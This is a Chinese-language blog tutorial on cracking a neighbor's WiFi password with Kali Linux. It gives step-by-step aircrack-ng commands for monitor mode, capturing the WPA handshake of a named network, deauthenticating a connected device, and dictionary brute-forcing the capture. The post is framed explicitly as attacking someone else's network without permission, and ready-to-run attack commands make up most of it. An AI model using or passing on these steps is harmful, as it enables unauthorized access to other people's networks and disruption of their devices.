1/3
2/3
3/3
超简单教程!如何用kali破解邻居的WiFi密码
Sevattal
2022年05月24日 11:46

Kali 破解 wifi 密码

前期准备

Kali 系统需要配置无线网卡驱动,如果 Kali 不支持你的无线网卡,你需要自行找到 kali 系统的 驱动打上去。

1、查看你的无线网卡是否启用

ifconfig

2、查看网卡是否支持监听功能

airmon-ng

3、打卡监听模式

airmon-ng start wlan0

4、查看监听网卡名称

ifconfig

5、扫描 wifi 信号

airodump-ng wlan0mon

注:我们以 CMCC-L8TF 为例,我们需要记录两个信息 BSSID 与 CH

BSSID:为 WIFI 的 MAC号

CH:为 WIFI 的频段

6、进行抓包

airodump-ng -c 1 --bssid 6C:06:D6:58:83:00 -w /home/kali/桌面/handshake wlan0mon

注:-c 后面是 wifi 的频段, --bssid 后面 是 wifi 的 MAC 号

-w 后面跟文件路径,即抓包的数据日志

这种抓包方式比较被动,只有等设备完成认证才能抓到握手包

7、使用ACK 攻击,将设备下线,然后就可以抓到正确的包(第六步的抓包窗口不能关闭)

aireplay-ng -0 10 -a 6C:06:D6:58:83:00 -c 9A:66:B7:56:5C:E7 wlan0mon

注: -0:表示通知设备断开连接

10:表示攻击 10 次

-a:后面跟的是要破解的 wifi 的 MAC 号

-c:表示要踢下线的设备,就是我们抓包的那个终端显示的 MAC 地址

8、 ACK 攻击完成后,关闭 (第六步)抓包命令

这个时候会在你抓包命令配置的路径生成 5 个文件,需要用的是下面的 cap 文件

9、暴力破解的过程(使用密码字典)

aircrack-ng -w /home/kali/桌面/字典.txt -b 6C:06:D6:58:83:00 /home/kali/桌面/handshake-01.cap

注: -w:后面跟的是密码字典,-b:后面跟的是 WIFI 的 MAC 号,最后跟的是 之前的抓包的 CAP 文件

等待暴力破解,如果字典中有wifi的密码 那么 wifi 的密码一定可以破解。

10、其他说明

密码破解完成不代表着可以连接,如果对方路由器绑定了 连接设备的 MAC 地址那么就算密码被破解了,也不能连上该 WIFI。